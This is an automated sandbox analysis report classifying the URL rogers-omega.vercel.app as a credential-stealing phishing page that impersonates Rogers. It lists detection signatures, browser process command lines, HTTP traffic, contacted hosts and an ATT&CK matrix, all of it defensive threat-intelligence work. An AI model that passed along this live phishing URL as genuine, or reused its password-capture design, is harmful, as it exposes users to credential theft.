Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://rogers-omega.vercel.app/

Overview

General Information

Sample URL:http://rogers-omega.vercel.app/
Analysis ID:1522047
Tags:openphish
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish64
HTML body contains low number of good links
HTML body contains password input but no form action

Classification

  • System is w10x64
  • chrome.exe (PID: 2688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 4420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=1940,i,5055358492478616502,14363016897838597285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 5412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://rogers-omega.vercel.app/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: http://rogers-omega.vercel.app/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social usering

    Phishing

    barindex
    Source: https://rogers-omega.vercel.app/LLM: Score: 9 Reasons: The brand 'Rogers' is a well-known telecommunications company in Canada., The legitimate domain for Rogers is 'rogers.com'., The provided URL 'rogers-omega.vercel.app' does not match the legitimate domain., The URL contains an extra word 'omega' which is suspicious and often indicative of phishing., The domain 'vercel.app' is a hosting service, which can be used by anyone to create websites, including phishing sites. DOM: 3.0.pages.csv
    Source: Yara matchFile source: 3.0.pages.csv, type: HTML
    Source: https://rogers-omega.vercel.app/HTTP Parser: Number of links: 0
    Source: https://rogers-omega.vercel.app/HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://rogers-omega.vercel.app/HTTP Parser: <input type="password" .../> found
    Source: https://rogers-omega.vercel.app/HTTP Parser: No favicon
    Source: https://rogers-omega.vercel.app/HTTP Parser: No <meta name="author".. found
    Source: https://rogers-omega.vercel.app/HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49749 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49753 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49757 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: unknownTCP traffic detected without corresponding DNS query: 40.115.3.253
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /style.css HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /email.js HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npm/@emailjs/browser@3/dist/email.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.2.3/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rogers-omega.vercel.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/rogers.png HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /app.js HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /email.js HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npm/@emailjs/browser@3/dist/email.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/rogers_bgr.jpg HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rogers-omega.vercel.app/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://rogers-omega.vercel.appsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/rogers.png HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /app.js HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rogers-omega.vercel.app/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /assets/rogers_bgr.jpg HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: rogers-omega.vercel.appConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: rogers-omega.vercel.app
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: public, max-age=0, must-revalidateContent-Length: 39Content-Type: text/plain; charset=utf-8Date: Sun, 29 Sep 2024 05:50:36 GMTServer: VercelStrict-Transport-Security: max-age=63072000; includeSubDomains; preloadX-Vercel-Error: NOT_FOUNDX-Vercel-Id: iad1::n9269-1727589036133-a1ab4ab92ef3Connection: close
    Source: chromecache_64.2.drString found in binary or memory: https://api.emailjs.com
    Source: chromecache_62.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/
    Source: chromecache_62.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
    Source: chromecache_58.2.dr, chromecache_64.2.drString found in binary or memory: https://dashboard.emailjs.com/admin
    Source: chromecache_58.2.dr, chromecache_64.2.drString found in binary or memory: https://dashboard.emailjs.com/admin/account
    Source: chromecache_58.2.dr, chromecache_64.2.drString found in binary or memory: https://dashboard.emailjs.com/admin/templates
    Source: chromecache_62.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Material
    Source: chromecache_60.2.drString found in binary or memory: https://fonts.googleapis.com/css2?family=Montserrat:wght
    Source: chromecache_67.2.drString found in binary or memory: https://fonts.gstatic.com/s/materialsymbolsoutlined/v207/kJF1BvYX7BgnkSrUwT8OhrdQw4oELdPIeeII9v6oDMz
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1JlFc-K.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLGT9Z1JlFc-K.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLGT9Z1xlFQ.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJfecg.woff2)
    Source: chromecache_55.2.drString found in binary or memory: https://fonts.gstatic.com/s/poppins/v21/pxiEyp8kv8JHgFVrJJnecmNE.woff2)
    Source: chromecache_59.2.dr, chromecache_53.2.dr, chromecache_65.2.drString found in binary or memory: https://getbootstrap.com/)
    Source: chromecache_59.2.dr, chromecache_53.2.dr, chromecache_65.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
    Source: chromecache_53.2.dr, chromecache_65.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
    Source: chromecache_52.2.dr, chromecache_66.2.drString found in binary or memory: https://www.rogers.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49740 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49749 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49753 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49757 version: TLS 1.2
    Source: classification engineClassification label: mal64.phis.win@17/38@12/8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=1940,i,5055358492478616502,14363016897838597285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://rogers-omega.vercel.app/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2644 --field-trial-handle=1940,i,5055358492478616502,14363016897838597285,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
    Process Injection
    1
    Process Injection
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    http://rogers-omega.vercel.app/100%SlashNextCredential Stealing type: Phishing & Social usering
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://getbootstrap.com/)0%URL Reputationsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.129.229
    truefalse
      unknown
      rogers-omega.vercel.app
      76.76.21.123
